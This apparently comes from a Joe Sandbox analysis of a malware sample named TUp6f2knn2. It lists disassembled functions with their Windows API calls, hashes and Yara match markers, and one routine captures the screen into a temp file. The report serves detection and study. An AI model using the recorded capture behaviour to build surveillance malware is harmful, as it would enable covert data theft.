Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 1990047661bdfb9319f3b452a822e007db470b73aeb2c0263dc6d2f9d4925e70
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: 60F03C32A20305DBE714EF68D905B5D77E1BF45725F104166FA00DB2E1CB7999448F49

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 0256B4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0256BCAB,02560A1C,?,?,?,?,?,02560A1C,?,?,?), ref: 0256B520

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: 59894e6f06e7f22a890a9152acbd6f38e69b9e0e09655e91b83aa7b343979a63
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 93F0203A30020957CB089F36E80877ABF94EBC1754B0A0059EF09CB290D2319842C794

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 025408CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0253FE60), ref: 025408D2

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 025576EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: a6b56b38f12def8352364327443392e303977831a0a7f97f91a2efbbf5286018
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: D6D1B4722085F24ACB2D4A39847403AFFF27A461A530D479FECF7CA5C2EE24D654D664

Function 02557FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: a0b7ab314cae5b3f090971326c87572a0d5cdf0adee7d01450a3ba4b9b647341
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 819165722090F34AEB29467E847813EFFE16E412A530A079FDCF2CA1D5EF24D594D624

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 02558289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 7b5b218c67ceb416409c83da04b046c73e78b88359a2a61a4d4a4aef04e4e67c
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 109143722090F34AEB69467E857C13EFFE16A421A530A07AFDCF2CA1C5EF24D594D624

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 02557D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 8834fb9c993d831c9b1b98f18571825dea84ebbbdce6b45328d305d535a4ec0d
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 209151722091F30AEB29863D857453EFEE1AA451A570A0B9FECF2CF1C1EF24D654D624

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 0255D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 465161a626065082b299abfe7212ad27b83248453dd1c91746e749c37a57a23f
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 3A617A7361273956DA386A6C88B07BE6BB5BF81B28F04081BEC42DF6C0D71D9941CB5D

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 02557A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 0797eabdad4ed501ab518ac0d3ad5b29fc846cd0d0156ad858601b6b13ca5450
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D48152722094F34AEB69467E847413EFFE16A461A570A079FECF2CB1C1FF149254D624

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 025587C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 09b1380514d62ad0a948ecf911fea7277cc3175f2dce85a817308f4145022eb3
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 99112B7720007247D618867ED4BC2BBEB85FBC523872C5E7BD8824B758D32AE1C4D608

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 00B4AD0B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130558375.0000000000B4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b4a000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 79ef82af984d7e78f7698076de9b52d68409c403de93843e8fb400754bb57198
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 7711E572780100AFDB04DF55DCC1FA673EAEB88360B2980A5ED08CB716D675EC01D761

Function 02530D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 08bceb0361da5b6e7775d52686b1b8503c02ec545d04f8372b4104aed432aab6
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 9C01A276B107048FDF22DF24C804BAB33E5FB86216F4554A5D90A972C1E774A9418B98

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0255E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0255E989
_free.LIBCMT ref: 0255E99F
_free.LIBCMT ref: 0255E9B0
_free.LIBCMT ref: 0255E9C1
_free.LIBCMT ref: 0255E9D8
GetCPInfo.KERNEL32(?,?), ref: 0255EA20

Part of subcall function 02566952: _free.LIBCMT ref: 025669BD

_free.LIBCMT ref: 0255EBCC
_free.LIBCMT ref: 0255EBDF
_free.LIBCMT ref: 0255EBED
_free.LIBCMT ref: 0255EBF8
_free.LIBCMT ref: 0255EC3A
_free.LIBCMT ref: 0255EC42
_free.LIBCMT ref: 0255EC4A
_free.LIBCMT ref: 0255EC52
_free.LIBCMT ref: 0255EC60

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 9bcad12062310c207280c3719b2be925253ed1cfb2727af44c8d083c7aab142b
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: A4B1CF7190021AAFDB21DF78C895BEEBBF5BF48304F14406EE899A7241D775A941CB28

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0256A85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0256A8A3

Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C0F
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C21
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C33
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C45
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C57
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C69
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C7B
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C8D
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569C9F
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569CB1
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569CC3
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569CD5
Part of subcall function 02569BF2: _free.LIBCMT ref: 02569CE7

_free.LIBCMT ref: 0256A898

Part of subcall function 025636D1: HeapFree.KERNEL32(00000000,00000000,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?), ref: 025636E7
Part of subcall function 025636D1: GetLastError.KERNEL32(?,?,0256A35F,?,00000000,?,00000000,?,0256A603,?,00000007,?,?,0256A9F7,?,?), ref: 025636F9

_free.LIBCMT ref: 0256A8BA
_free.LIBCMT ref: 0256A8CF
_free.LIBCMT ref: 0256A8DA
_free.LIBCMT ref: 0256A8FC
_free.LIBCMT ref: 0256A90F
_free.LIBCMT ref: 0256A91D
_free.LIBCMT ref: 0256A928
_free.LIBCMT ref: 0256A960
_free.LIBCMT ref: 0256A967
_free.LIBCMT ref: 0256A984
_free.LIBCMT ref: 0256A99C

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 0a607cc727d4428fb696289d39b6fd3ef0ef7655070e2adef240243248ed7e94
